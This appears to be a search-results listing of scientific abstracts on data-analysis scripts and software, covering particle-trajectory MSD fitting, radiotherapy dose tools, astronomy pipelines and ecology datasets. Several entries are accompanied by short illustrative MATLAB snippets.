It accepts time-dependent trajectories of several particles; each trajectory is run through the program, its time-averaged MSD is calculated, and power laws are determined in regions where the MSD is linear on a log-log scale. Our algorithm searches for high-curvature points in experimental data, here the time-dependent MSD. Those serve as anchor points for determining the ranges of the power-law fits. Power-law scaling is then accurately determined, and error estimations of the parameters and quality of fit are provided. After all single-trajectory time-averaged MSDs are fit, we obtain cutoffs from the user to categorize and segment the power laws into groups; cutoffs are either in exponents of the power laws, time of appearance of the fits, or both together. The trajectories are sorted according to the cutoffs, and the time- and ensemble-averaged MSD of each group is provided, with histograms of the distributions of the exponents in each group. The program then allows the user to generate new trajectory files with trajectories segmented according to the determined groups, for any further required analysis. Additional comments: A README file giving the names and a brief description of all the files that make up the package, and clear instructions on the installation and execution of the program, is included in the distribution package. Running time: On an i5 Windows 7 machine with 4 GB RAM, the automated parts of the run (excluding data loading and user input) take less than 45 minutes to analyze and save all stages for an 844-trajectory file, including the optional PDF save. Trajectory length did not affect run time (tested up to 3600 frames/trajectory), which was on average 3.2±0.4 seconds per trajectory.
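The core operation being automated is simple to state: compute the time-averaged MSD of a trajectory over all lag times, then fit MSD(τ) ∝ τ^α on a log-log scale. The MATLAB sketch below shows that basic calculation for a single 2-D trajectory; it omits the program's anchor-point search and grouping logic, and the synthetic random-walk trajectory is only an illustration.

% Time-averaged MSD of one 2-D trajectory and a single power-law fit
% MSD(tau) ~ prefactor * tau^alpha on a log-log scale. A synthetic diffusive
% trajectory is used for illustration; the published code additionally locates
% fit ranges automatically and groups trajectories by exponent.
dt = 0.05;                                    % frame interval [s]
N  = 2000;                                    % number of frames
xy = cumsum(sqrt(2*0.1*dt) * randn(N, 2));    % random walk, D = 0.1 (arbitrary units)

maxLag = floor(N/4);                          % restrict to well-sampled lags
msd = zeros(maxLag, 1);
for lag = 1:maxLag
    d = xy(1+lag:end, :) - xy(1:end-lag, :);  % displacements at this lag
    msd(lag) = mean(sum(d.^2, 2));            % time-averaged squared displacement
end
tau = (1:maxLag)' * dt;

p = polyfit(log10(tau), log10(msd), 1);       % slope = exponent alpha
alpha = p(1);
prefactor = 10^p(2);
fprintf('alpha = %.2f, prefactor = %.3g\n', alpha, prefactor);

loglog(tau, msd, '.', tau, prefactor*tau.^alpha, '-');
xlabel('\tau [s]'); ylabel('MSD'); legend('data', 'power-law fit', 'Location', 'northwest');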
TU-AB-BRC-12: Optimized Parallel Monte Carlo Dose Calculations for Secondary MU Checks
DOE Office of Scientific and Technical Information (OSTI.GOV)
French, S; Nazareth, D; Bellor, M
Purpose: Secondary MU checks are an important tool used during a physics review of a treatment plan. Commercial software packages offer varying degrees of theoretical dose calculation accuracy, depending on the modality involved. Dose calculations of VMAT plans are especially prone to error due to the large approximations involved. Monte Carlo (MC) methods are not commonly used due to their long run times. We investigated two methods to increase the computational efficiency of MC dose simulations with the BEAMnrc code. Distributed computing resources, along with optimized code compilation, will allow for accurate and efficient VMAT dose calculations. Methods: The BEAMnrc package was installed on a high-performance computing cluster accessible to our clinic. MATLAB and Python scripts were developed to convert a clinical VMAT DICOM plan into BEAMnrc input files. The BEAMnrc installation was optimized by running the VMAT simulations through profiling tools which indicated the behavior of the constituent routines in the code, e.g., the bremsstrahlung splitting routine and the specified random number generator. This information aided in determining the most efficient parallel compiling configuration for the specific CPUs available on our cluster, resulting in the fastest VMAT simulation times. Our method was evaluated with calculations involving 10^8 - 10^9 particle histories, which are sufficient to verify patient dose using VMAT. Results: Parallelization allowed the calculation of patient dose on the order of 10 - 15 hours with 100 parallel jobs. Due to the compiler optimization process, further speed increases of 23% were achieved when compared with the open-source compiler BEAMnrc packages. Conclusion: Analysis of the BEAMnrc code allowed us to optimize the compiler configuration for VMAT dose calculations. In future work, the optimized MC code, in conjunction with the parallel processing capabilities of BEAMnrc, will be applied to provide accurate and efficient secondary MU checks.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Pyakuryal, A; Moroz, B; Lee, C
2016-06-15
Purpose: Epidemiological studies of second cancer risk in radiotherapy patients often require individualized dose estimates of normal tissues. Prior to 3D conformal radiation therapy planning, patient anatomy information was mostly limited to 2D radiological images or not even available. Generic patient CT images are often used in commercial radiotherapy treatment planning systems (TPS) to reconstruct normal tissue doses. The objective of the current work was to develop a series of reference-size computational human phantoms in DICOM-RT format for direct use in dose reconstruction in a TPS. Methods: Contours of 93 organs and tissues were extracted from a series of pediatric and adult hybrid computational human phantoms (newborn, 1-, 5-, 10-, 15-year-old, and adult males and females) using Rhinoceros software. A MATLAB script was created to convert the contours into the DICOM-RT structure format. Simulated CT images with a resolution of 1×1×3 mm3 were also generated from the binary phantom format and coupled with the DICOM-structure files. Accurate volumes of the organs were obtained through precise delineation of the contours in the converted format. Due to the complex geometry of the organs, a higher resolution (1×1×1 mm3) was found to be more efficient in the conversion of the newborn and 1-year-old phantoms. Results: Contour sets were efficiently converted into DICOM-RT structures in a relatively short time (about 30 minutes for each phantom). Good agreement was observed between the volumes of the original phantoms and the converted contours for large organs (NRMSD<1.0%) and small organs (NRMSD<7.7%). Conclusion: A comprehensive series of computational human phantoms in DICOM-RT format was created to support epidemiological studies of second cancer risks in radiotherapy patients. We confirmed that the DICOM-RT phantoms were successfully imported into the TPS programs of major vendors.
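The conversion step described here amounts to tracing each organ's boundary on every axial slice and flattening the result into the (x1, y1, z1, x2, y2, z2, ...) ContourData triplets that a DICOM-RT structure set expects, in patient (mm) coordinates. The MATLAB sketch below shows that per-slice step for a binary organ mask; it assumes the Image Processing Toolbox (bwboundaries), uses placeholder voxel spacing and origin, and stops short of writing the full RTSTRUCT metadata (ROI sequences, referenced images, UIDs).

% Trace one organ's outline on a single axial slice of a binary voxel phantom
% and flatten it into DICOM-RT ContourData triplets (x1 y1 z1 x2 y2 z2 ...).
% Voxel spacing, origin, and the synthetic elliptical mask are placeholders.
spacing = [1 1 3];                 % voxel size [mm] (row, col, slice)
origin  = [-255 -255 -450];        % patient-space position of voxel (1,1,1) [mm]
k       = 40;                      % slice index

[cc, rr] = meshgrid(1:512, 1:512);                 % synthetic elliptical "organ"
mask = ((cc-250)/60).^2 + ((rr-260)/40).^2 <= 1;

B = bwboundaries(mask, 8, 'noholes');              % boundary tracing (IP Toolbox)
contourData = [];
for b = 1:numel(B)
    rcs = B{b};                                    % [row, col] boundary points
    x = origin(1) + (rcs(:,2) - 1) * spacing(2);   % column -> x [mm]
    y = origin(2) + (rcs(:,1) - 1) * spacing(1);   % row    -> y [mm]
    z = origin(3) + (k - 1)        * spacing(3);   % slice  -> z [mm]
    contourData = [contourData; reshape([x y repmat(z, numel(x), 1)]', [], 1)];
end
fprintf('%d boundary points -> %d ContourData values\n', numel(contourData)/3, numel(contourData));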
VizieR Online Data Catalog: X-Ray source properties for NGC 2207/IC 2163 (Mineo+, 2014)
NASA Astrophysics Data System (ADS)
Mineo, S.; Rappaport, S.; Levine, A.; Pooley, D.; Steinhorn, B.; Homan, J.
2017-08-01
We analyzed four Chandra ACIS-S observations of the galaxy pair NGC 2207/IC 2163. The data reduction was done following the standard CIAO threads (CIAO version 4.6, CALDB version 4.5.9) for soft (0.5-2 keV), hard (2-8 keV), and broad (0.5-8.0 keV) energy bands. All Chandra data sets were reprocessed using chandra_repro, a script that automates the recommended data-processing steps presented in the CIAO analysis threads. Using the script fluximage, we computed a monochromatic exposure map for the mean photon energy of each band: 1.25 keV, 5.0 keV, and 4.25 keV for the soft, hard, and broad band, respectively. fluximage outputs both the instrument map for the center of each energy band using the tool mkinstmap and the exposure maps in sky coordinates for each energy band using mkexpmap. (5 data files).
IMCAT: Image and Catalogue Manipulation Software
NASA Astrophysics Data System (ADS)
Kaiser, Nick
2011-08-01
The IMCAT software was developed initially to do faint galaxy photometry for weak lensing studies, and provides a fairly complete set of tools for this kind of work. Unlike most packages for doing data analysis, the tools are standalone unix commands which you can invoke from the shell, via shell scripts or from perl scripts. The tools are arranged in a tree of directories. One main branch is the 'imtools'. These deal only with fits files. The most important imtool is the 'image calculator' 'ic', which allows one to do rather general operations on fits images. A second branch is the 'catools', which operate only on catalogues. The key cattool is 'lc'; this effectively defines the format of IMCAT catalogues, and allows one to do very general operations on and filtering of such catalogues. A third branch is the 'imcattools'. These tend to be much more specialised than the imtools and catools, and are focussed on faint galaxy photometry.
NASA Astrophysics Data System (ADS)
Reddy, K. Rasool; Rao, Ch. Madhava
2018-04-01
Safety is currently one of the primary concerns in the transmission of images, owing to the increasing use of images in industrial applications, so it is necessary to secure image data from unauthorized individuals. Various strategies have been investigated to secure such data, and encryption is one of the most prominent. This paper presents a refined Rijndael (AES) algorithm to protect data from unauthorized parties. An Exponential Key Exchange (EKE) concept is also introduced to exchange the key between client and server. Data are exchanged over the network between client and server through a simple protocol known as the Trivial File Transfer Protocol (TFTP). This protocol is used mainly in embedded servers to transfer data, and it can also protect the data if protection capabilities are integrated. In this paper, we implement a GUI environment for image encryption and decryption. All experiments were carried out on a Linux environment using an OpenCV-Python script.
Data Processing Factory for the Sloan Digital Sky Survey
NASA Astrophysics Data System (ADS)
Stoughton, Christopher; Adelman, Jennifer; Annis, James T.; Hendry, John; Inkmann, John; Jester, Sebastian; Kent, Steven M.; Kuropatkin, Nickolai; Lee, Brian; Lin, Huan; Peoples, John, Jr.; Sparks, Robert; Tucker, Douglas; Vanden Berk, Dan; Yanny, Brian; Yocum, Dan
2002-12-01
The Sloan Digital Sky Survey (SDSS) data handling presents two challenges: large data volume and timely production of spectroscopic plates from imaging data. A data processing factory, using technologies both old and new, handles this flow. Distribution to end users is via disk farms, to serve corrected images and calibrated spectra, and a database, to efficiently process catalog queries. For distribution of modest amounts of data from Apache Point Observatory to Fermilab, scripts use rsync to update files, while larger data transfers are accomplished by shipping magnetic tapes commercially. All data processing pipelines are wrapped in scripts to address consecutive phases: preparation, submission, checking, and quality control. We constructed the factory by chaining these pipelines together while using an operational database to hold processed imaging catalogs. The science database catalogs all imaging and spectroscopic objects, with pointers to the various external files associated with them. Diverse computing systems address particular processing phases. UNIX computers handle tape reading and writing, as well as calibration steps that require access to a large amount of data with relatively modest computational demands. Commodity CPUs process steps that require access to a limited amount of data with more demanding computational requirements. Disk servers optimized for cost per Gbyte serve terabytes of processed data, while servers optimized for disk read speed run SQLServer software to process queries on the catalogs. This factory produced data for the SDSS Early Data Release in June 2001, and it is currently producing Data Release One, scheduled for January 2003.
Moderate-resolution sea surface temperature data for the nearshore North Pacific
Payne, Meredith C.; Reusser, Deborah A.; Lee, Henry; Brown, Cheryl A.
2011-01-01
Coastal sea surface temperature (SST) is an important environmental characteristic in determining the suitability of habitat for nearshore marine and estuarine organisms. This publication describes and provides access to an easy-to-use coastal SST dataset for ecologists, biogeographers, oceanographers, and other scientists conducting research on nearshore marine habitats or processes. The data cover the Temperate Northern Pacific Ocean as defined by the 'Marine Ecosystems of the World' (MEOW) biogeographic schema developed by The Nature Conservancy. The spatial resolution of the SST data is 4-km grid cells within 20 km of the shore. The data span a 29-year period - from September 1981 to December 2009. These SST data were derived from Advanced Very High Resolution Radiometer (AVHRR) instrument measurements compiled into monthly means as part of the Pathfinder versions 5.0 and 5.1 (PFSST V50 and V51) Project. The processing methods used to transform the data from their native Hierarchical Data Format Scientific Data Set (HDF SDS) to georeferenced, spatial datasets capable of being read into geographic information systems (GIS) software are explained. In addition, links are provided to examples of scripts involved in the data processing steps. The scripts were written in the Python programming language, which is supported by ESRI's ArcGIS version 9 or later. The processed data files are also provided in text (.csv) and Access 2003 Database (.mdb) formats. All data except the raster files include attributes identifying realm, province, and ecoregion as defined by the MEOW classification schema.
SEQassembly: A Practical Tools Program for Coding Sequences Splicing
NASA Astrophysics Data System (ADS)
Lee, Hongbin; Yang, Hang; Fu, Lei; Qin, Long; Li, Huili; He, Feng; Wang, Bo; Wu, Xiaoming
CDS (coding sequence) is the portion of an mRNA sequence that is composed of a number of exon sequence segments. The construction of CDS sequences is important for deeper genetic analyses such as genotyping. A program in the MATLAB environment is presented which can process batches of sample sequences into coding segments under the guidance of reference exon models, and splice the coding segments from the same sample source into a CDS according to the exon order in a queue file. This program is useful in transcriptional polymorphism detection and gene function studies.
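The splicing step itself is simple string assembly: for each sample, the recovered exon segments are concatenated in the order dictated by the queue file. The MATLAB sketch below illustrates that assembly with a containers.Map of exon segments and a hypothetical exon order; it is not the published program, and sequence validation (reading frame, start/stop codons) is omitted.

% Assemble a CDS by concatenating exon segments for one sample in the order
% given by a queue (exon order) list. Segment contents and exon names are
% hypothetical; real use would read them from alignment results and a queue file.
segments = containers.Map( ...
    {'exon1', 'exon2', 'exon3'}, ...
    {'ATGGCT', 'GGAACCTT', 'GACTAA'});

queueOrder = {'exon1', 'exon2', 'exon3'};      % order read from the queue file

cds = '';
for i = 1:numel(queueOrder)
    name = queueOrder{i};
    if ~isKey(segments, name)
        error('Missing exon segment "%s" for this sample.', name);
    end
    cds = [cds, segments(name)];               %#ok<AGROW> concatenate in exon order
end
fprintf('Spliced CDS (%d nt): %s\n', length(cds), cds);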
Automation Framework for Flight Dynamics Products Generation
NASA Technical Reports Server (NTRS)
Wiegand, Robert E.; Esposito, Timothy C.; Watson, John S.; Jun, Linda; Shoan, Wendy; Matusow, Carla
2010-01-01
XFDS provides an easily adaptable automation platform. To date it has been used to support flight dynamics operations. It coordinates the execution of other applications such as Satellite Tool Kit, FreeFlyer, MATLAB, and Perl code. It provides a mechanism for passing messages among a collection of XFDS processes, and allows sending and receiving of GMSEC messages. A unified and consistent graphical user interface (GUI) is used for the various tools. Its automation configuration is stored in text files, and can be edited either directly or using the GUI.
A Phase-Based Approach to Satellite Constellation Analysis and Design
1991-01-01
... φp is a phase angle representing true anomaly, as measured from the line of nodes. For a spherical earth, the orbital parameters are related ...
Stanzel, Sven; Weimer, Marc; Kopp-Schneider, Annette
2013-06-01
High-throughput screening approaches are carried out for the toxicity assessment of a large number of chemical compounds. In such large-scale in vitro toxicity studies several hundred or thousand concentration-response experiments are conducted. The automated evaluation of concentration-response data using statistical analysis scripts saves time and yields more consistent results in comparison to data analysis performed by the use of menu-driven statistical software. Automated statistical analysis requires that concentration-response data are available in a standardised data format across all compounds. To obtain consistent data formats, a standardised data management workflow must be established, including guidelines for data storage, data handling and data extraction. In this paper two procedures for data management within large-scale toxicological projects are proposed. Both procedures are based on Microsoft Excel files as the researcher's primary data format and use a computer programme to automate the handling of data files. The first procedure assumes that data collection has not yet started whereas the second procedure can be used when data files already exist. Successful implementation of the two approaches into the European project ACuteTox is illustrated. Copyright © 2012 Elsevier Ltd. All rights reserved.
HeFPipe: a complete analytical pipeline for heterozygosity-fitness correlation studies.
Fisher, Mark A
2014-01-01
As the body of heterozygosity-fitness correlation (HFC) research grows, more and increasingly complicated tests have become an integral part of a typical HFC analysis (Chapman et al. 2009). Currently, no software is available to undertake conversion between the file formats required to conduct all of these tests and to conduct the main regression analyses at the core of all HFCs. Heterozygosity-Fitness Pipeline (HeFPipe) is a script written in Python that accomplishes both of these tasks for studies based on microsatellite data. HeFPipe is designed to be used from the command line terminal and will run on any Mac OSX computer. The script takes input in the form of allele reports from either the genotype-calling software, GeneMapper or GeneMarker, and reconfigures the data into GENEPOP (Raymond & Rousset 1995), Rhh (Alho et al. 2010), RMES (David et al. 2007) and GEPHAST (Amos & Acevedo-Whitehouse 2009) formats. The script is also equipped to reformat the output from GENEPOP on the Web (option 5) and Rhh into csv spreadsheets that can be incorporated into downstream analyses. HeFPipe accommodates user-provided lists of samples and markers to be included in or excluded from analyses. HeFPipe is equipped to create generalized linear models (GLMs) from both the main data set and subsets of the data. Finally, HeFPipe allows users to explore single-marker effects and conduct correlation analyses. The script, a comprehensive manual, a link to a series of video tutorials, and an example data set are available from GitHub (http://github.com/Atticus29/HeFPipe_rpos). © 2013 John Wiley & Sons Ltd.
DOE Office of Scientific and Technical Information (OSTI.GOV)
2007-06-18
UEDGE is an interactive suite of physics packages using the Python or BASIS scripting systems. The plasma is described by time-dependent 2D plasma fluid equations that include equations for density, velocity, ion temperature, electron temperature, electrostatic potential, and gas density in the edge region of a magnetic fusion energy confinement device. Slab, cylindrical, and toroidal geometries are allowed, and closed and open magnetic field-line regions are included. Classical transport is assumed along magnetic field lines, and anomalous transport is assumed across field lines. Multi-charge-state impurities can be included with the corresponding line-radiation energy loss. Although UEDGE is written in Fortran, for efficient execution and analysis of results it utilizes either Python or BASIS scripting shells. Python is easily available for many platforms (http://www.Python.org/). The features and availability of BASIS are described in "Basis Manual Set" by P.F. Dubois, Z.C. Motteler, et al., Lawrence Livermore National Laboratory report UCRL-MA-118541, June 2002, and http://basis.llnl.gov. BASIS has been reviewed and released by LLNL for unlimited distribution. The Python version utilizes PYBASIS scripts developed by D.P. Grote, LLNL. The Python version also uses MPPL code and a MAC Perl script, available from the public-domain BASIS source above. The Forthon version of UEDGE uses the same source files, but utilizes Forthon to produce a Python-compatible source. Forthon has been developed by D.P. Grote at LBL (see http://hifweb.lbl.gov/Forthon/ and Grote et al. in the references below), and it is freely available. The graphics can be performed by any package importable to Python, such as PYGIST.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Powell, Thomas; Kueppers, Lara; Paton, Steve
This dataset is a derivative product of raw meteorological data collected at Barro Colorado Island (BCI), Panama (see acknowledgements below). The dataset contains the following: 1) a seven-year record (2008-2014) of meteorological observations from BCI in comma-delimited text format, 2) an R script that converts the observed meteorology into an HDF5 format that can be read by the ED2 model, 3) two decades of meteorological drivers in HDF5 format that are based on the 7-year record of observations and include a synthetic 2-year El Nino drought, and 4) a ReadMe.txt file that explains how the data in the HDF5 meteorological drivers correspond to the observations. The raw meteorological data were further QC'd as part of the NGEE-Tropics project to derive item 1 above. The R script makes the appropriate unit conversions for all observed meteorological variables to be compatible with the ED2 model. The R script also converts RH into specific humidity, splits total shortwave radiation into its 4-stream parts, and calculates longwave radiation from air temperature and RH. The synthetic El Nino drought is based on selected months from the observed meteorology in which precipitation (only) was modified to reflect the precipitation patterns of the 1982/83 El Nino observed at BCI.
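One of the conversions mentioned, relative humidity to specific humidity, is standard meteorological arithmetic: compute the saturation vapor pressure from air temperature, scale by RH to get the actual vapor pressure, then form the moist-air ratio. The MATLAB sketch below uses the common Bolton (1980) saturation approximation and an assumed constant surface pressure; it is a generic illustration, not the dataset's R script, which may use a different formulation.

% Convert relative humidity and air temperature to specific humidity.
% Bolton (1980) saturation vapor pressure approximation; constant pressure assumed.
T_C = 27.0;          % air temperature [deg C]
RH  = 85.0;          % relative humidity [%]
p   = 101325;        % air pressure [Pa] (assumed)

es = 611.2 * exp(17.67 * T_C / (T_C + 243.5));   % saturation vapor pressure [Pa]
e  = (RH/100) * es;                              % actual vapor pressure [Pa]
q  = 0.622 * e / (p - 0.378 * e);                % specific humidity [kg/kg]

fprintf('Specific humidity: %.4f kg/kg (%.1f g/kg)\n', q, 1000*q);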
Parallel, Distributed Scripting with Python
DOE Office of Scientific and Technical Information (OSTI.GOV)
Miller, P J
2002-05-24
Parallel computers used to be, for the most part, one-of-a-kind systems which were extremely difficult to program portably. With SMP architectures, the advent of the POSIX thread API and OpenMP gave developers ways to portably exploit on-the-box shared-memory parallelism. Since these architectures didn't scale cost-effectively, distributed-memory clusters were developed. The associated MPI message passing libraries gave these systems a portable paradigm too. Having programmers effectively use this paradigm is a somewhat different question. Distributed data has to be explicitly transported via the messaging system in order for it to be useful. In high-level languages, the MPI library gives access to data distribution routines in C, C++, and FORTRAN. But we need more than that. Many reasonable and common tasks are best done in (or as extensions to) scripting languages. Consider sysadm tools such as password crackers, file purgers, etc. These are simple to write in a scripting language such as Python (an open source, portable, and freely available interpreter). But these tasks beg to be done in parallel. Consider a password checker that checks an encrypted password against a 25,000-word dictionary. This can take around 10 seconds in Python (6 seconds in C). It is trivial to parallelize if you can distribute the information and coordinate the work.
FlaME: Flash Molecular Editor - a 2D structure input tool for the web.
Dallakian, Pavel; Haider, Norbert
2011-02-01
So far, there have been no Flash-based web tools available for chemical structure input. The authors herein present a feasibility study, aiming at the development of a compact and easy-to-use 2D structure editor, using Adobe's Flash technology and its programming language, ActionScript. As a reference model application from the Java world, we selected the Java Molecular Editor (JME). In this feasibility study, we made an attempt to realize a subset of JME's functionality in the Flash Molecular Editor (FlaME) utility. These basic capabilities are: structure input, editing and depiction of single molecules, data import and export in molfile format. The result of molecular diagram sketching in FlaME is accessible in V2000 molfile format. By integrating the molecular editor into a web page, its communication with the HTML elements on this page is established using the two JavaScript functions, getMol() and setMol(). In addition, structures can be copied to the system clipboard. A first attempt was made to create a compact single-file application for 2D molecular structure input/editing on the web, based on Flash technology. With the application examples presented in this article, it could be demonstrated that the Flash methods are principally well-suited to provide the requisite communication between the Flash object (application) and the HTML elements on a web page, using JavaScript functions.
Harrison, Arnell S.; Dadisman, Shawn V.; Kindinger, Jack G.; Morton, Robert A.; Blum, Mike D.; Wiese, Dana S.; Subiño, Janice A.
2007-01-01
In June of 1996, the U.S. Geological Survey conducted geophysical surveys from Nueces to Copano Bays, Texas. This report serves as an archive of unprocessed digital boomer seismic reflection data, trackline maps, navigation files, GIS information, cruise log, and formal FGDC metadata. Filtered and gained digital images of the seismic profiles and high resolution scanned TIFF images of the original paper printouts are also provided. The archived trace data are in standard Society of Exploration Geophysicists (SEG) SEG-Y format (Barry and others, 1975) and may be downloaded and processed with commercial or public domain software such as Seismic Unix (SU). Example SU processing scripts and USGS software for viewing the SEG-Y files (Zihlman, 1992) are also provided.
Harrison, Arnell S.; Dadisman, Shawn V.; Davis, Jeffrey B.; Flocks, James G.; Wiese, Dana S.
2009-01-01
From September 2 through 4, 2008, the U.S. Geological Survey and St. Johns River Water Management District (SJRWMD) conducted geophysical surveys in Lakes Cherry, Helen, Hiawassee, Louisa, and Prevatt, central Florida. This report serves as an archive of unprocessed digital boomer seismic reflection data, trackline maps, navigation files, GIS information, FACS logs, and formal FGDC metadata. Filtered and gained digital images of the seismic profiles are also provided. The archived trace data are in standard Society of Exploration Geophysicists (SEG) SEG-Y format (Barry and others, 1975) and may be downloaded and processed with commercial or public domain software such as Seismic Unix (SU). Example SU processing scripts and USGS software for viewing the SEG-Y files (Zihlman, 1992) are also provided.
Enhancing AFLOW Visualization using Jmol
NASA Astrophysics Data System (ADS)
Lanasa, Jacob; New, Elizabeth; Stefek, Patrik; Honaker, Brigette; Hanson, Robert; Aflow Collaboration
The AFLOW library is a database of theoretical solid-state structures and calculated properties created using high-throughput ab initio calculations. Jmol is a Java-based program capable of visualizing and analyzing complex molecular structures and energy landscapes. In collaboration with the AFLOW consortium, our goal is the enhancement of the AFLOWLIB database through the extension of Jmol's capabilities in the area of materials science. Modifications made to Jmol include the ability to read and visualize AFLOW binary alloy data files, the ability to extract information from these files using Jmol scripting macros that can be utilized in the creation of interactive web-based convex hull graphs, the capability to identify and classify local atomic environments by symmetry, and the ability to search one or more related crystal structures for atomic environments using a novel extension of inorganic polyhedron-based SMILES strings.
Using MATLAB software with Tomcat server and Java platform for remote image analysis in pathology.
Markiewicz, Tomasz
2011-03-30
The Matlab software is one of the most advanced development tools for applications in engineering practice. From our point of view, the most important component is the image processing toolbox, offering many built-in functions, including mathematical morphology, and implementations of many artificial neural networks as AI. It is a very popular platform for creating specialized programs for image analysis, also in pathology. Based on the latest version of the Matlab Builder Java toolbox, it is possible to create software serving as a remote system for image analysis in pathology via internet communication. The internet platform can be realized based on Java Servlet Pages with the Tomcat server as the servlet container. In the presented software implementation we propose remote image analysis realized by Matlab algorithms. These algorithms can be compiled to an executable jar file with the help of the Matlab Builder Java toolbox. The Matlab function must be declared with the set of input data, an output structure with numerical results, and a Matlab web figure. Any function prepared in that manner can be used as a Java function in Java Servlet Pages (JSP). The graphical user interface providing the input data and displaying the results (also in graphical form) must be implemented in JSP. Additionally, data storage to a database can be implemented within the algorithm written in Matlab with the help of the Matlab Database Toolbox, directly with the image processing. The complete JSP page can be run by the Tomcat server. The proposed tool for remote image analysis was tested on the Computerized Analysis of Medical Images (CAMI) software developed by the author. The user provides the image and case information (diagnosis, staining, image parameters, etc.). When analysis is initialized, the input data with the image are sent to the servlet on Tomcat. When analysis is done, the client obtains the graphical results as an image with marked recognized cells and also the quantitative output. Additionally, the results are stored in a server database. The internet platform was tested on a PC Intel Core2 Duo T9600 2.8 GHz 4 GB RAM server with 768x576 pixel size, 1.28 Mb tiff format images referring to meningioma tumour (x400, Ki-67/MIB-1). The time consumption was as follows: at analysis by CAMI, locally on a server - 3.5 seconds; at remote analysis - 26 seconds, of which 22 seconds were used for data transfer via the internet connection. With a jpg format image (102 Kb) the time was reduced to 14 seconds. The results have confirmed that the designed remote platform can be useful for pathology image analysis. The time consumption depends mainly on the image size and the speed of the internet connection. The presented implementation can be used for many types of analysis with different staining, tissue, and morphometry approaches, etc. A significant problem is the implementation of the JSP page in multithreaded form, so that it can be used in parallel by many users. The presented platform for image analysis in pathology can be especially useful for small laboratories without their own image analysis system.
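The key convention described above is that each deployable Matlab function takes the input data and returns a structure of numerical results plus a figure for display on the web page. A minimal sketch of a function in that shape is shown below; the simple thresholding "analysis" (Image Processing Toolbox calls) and the field names are illustrative assumptions, not the CAMI algorithms, and the Matlab Builder JA packaging step itself is not shown.

% Sketch of a deployable analysis function in the shape the abstract describes:
% image path in, a struct of numerical results out, plus a figure for web display.
% The thresholding "analysis" and field names are illustrative only.
function [results, fig] = analyzeSlide(imagePath, minCellArea)
    rgb  = imread(imagePath);
    gray = rgb2gray(rgb);
    bw   = imbinarize(imcomplement(gray));        % dark nuclei -> foreground
    bw   = bwareaopen(bw, minCellArea);           % drop objects below size cutoff

    stats = regionprops(bw, 'Area', 'Centroid');  % per-object measurements
    results = struct( ...
        'cellCount', numel(stats), ...
        'meanAreaPx', mean([stats.Area]), ...
        'imageFile', imagePath);

    fig = figure('Visible', 'off');               % figure handle returned for web rendering
    imshow(rgb); hold on;
    c = vertcat(stats.Centroid);
    if ~isempty(c), plot(c(:,1), c(:,2), 'g+'); end
    title(sprintf('Detected cells: %d', results.cellCount));
end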
Poster - Thur Eve - 54: A software solution for ongoing DVH quality assurance in radiation therapy.
Annis, S-L; Zeng, G; Wu, X; Macpherson, M
2012-07-01
A program has been developed in MATLAB for use in quality assurance of treatment planning of radiation therapy. It analyzes patient DVH files and compiles dose volume data for review, trending, comparison and analysis. Patient DVH files are exported from the Eclipse treatment planning system and saved according to treatment site and date. Currently, analysis is available for four treatment sites (prostate, prostate bed, lung, and upper GI), with two functions for data reporting and analysis: patient-specific and organ-specific. The patient-specific function loads one patient DVH file and reports the user-specified dose volume data of organs and targets. These data can be compiled to an external file for third-party analysis. The organ-specific function extracts a requested dose volume of an organ from the DVH files of a patient group and reports the statistics over this population. A graphical user interface is utilized to select clinical sites, function and structures, and to input the user's requests. We have implemented this program in planning quality assurance at our center. The program has tracked the dosimetric improvement in GU sites after VMAT was implemented clinically. It has generated dose volume statistics for different groups of patients associated with technique or time range. This program allows reporting and statistical analysis of DVH files. It is an efficient tool for planning quality control in radiation therapy. © 2012 American Association of Physicists in Medicine.
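As a rough illustration of the organ-specific extraction described above, the following sketch reads a plain-text DVH export and interpolates the relative volume at a requested dose for one structure. The assumed file layout (a 'Structure:' header followed by two columns of dose in Gy and volume in %) is an illustration only, not the actual Eclipse export format handled by the program.

    function volAtDose = organDoseVolume(dvhFile, organName, doseGy)
    % Hedged sketch: extract V(doseGy) for one organ from a simple text DVH export.
    % The two-column "dose [Gy]  volume [%]" layout is an assumption.
        txt = fileread(dvhFile);
        blocks = regexp(txt, 'Structure:\s*(\w[^\n]*)\n(.*?)(?=Structure:|$)', 'tokens');
        volAtDose = NaN;
        for k = 1:numel(blocks)
            if strcmpi(strtrim(blocks{k}{1}), organName)
                data = sscanf(blocks{k}{2}, '%f %f', [2 Inf]).';   % rows of [dose, volume]
                volAtDose = interp1(data(:,1), data(:,2), doseGy); % e.g. bladder V65
                return;
            end
        end
    end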
Canal shaping with WaveOne Primary reciprocating files and ProTaper system: a comparative study.
Berutti, Elio; Chiandussi, Giorgio; Paolino, Davide Salvatore; Scotti, Nicola; Cantatore, Giuseppe; Castellucci, Arnaldo; Pasqualini, Damiano
2012-04-01
This study compared the canal curvature and axis modification after instrumentation with WaveOne Primary reciprocating files (Dentsply Maillefer, Ballaigues, Switzerland) and nickel-titanium (NiTi) rotary ProTaper (Dentsply Maillefer). Thirty ISO 15, 0.02 taper, Endo Training Blocks (Dentsply Maillefer) were used. In all specimens, the glide path was achieved with PathFile 1, 2, and 3 (Dentsply Maillefer) at the working length (WL). Specimens were then assigned to 1 of 2 groups for shaping: specimens in group 1 were shaped with ProTaper S1-S2-F1-F2 at the WL and specimens in group 2 were shaped with WaveOne Primary reciprocating files at the WL. Pre- and postinstrumentation digital images were superimposed and processed with Matlab r2010b (The MathWorks Inc, Natick, MA) software to analyze the curvature-radius ratio (CRr) and the relative axis error (rAe), representing canal curvature modification. Data were analyzed with one-way balanced analyses of variance at 2 levels (P < .05). The instrument factor was extremely significant for both the CRr parameter (F(1) = 9.59, P = .004) and the rAe parameter (F(1) = 13.55, P = .001). Canal modifications are reduced when the new WaveOne NiTi single-file system is used. Copyright © 2012 American Association of Endodontists. Published by Elsevier Inc. All rights reserved.
Web-based pathology practice examination usage.
Klatt, Edward C
2014-01-01
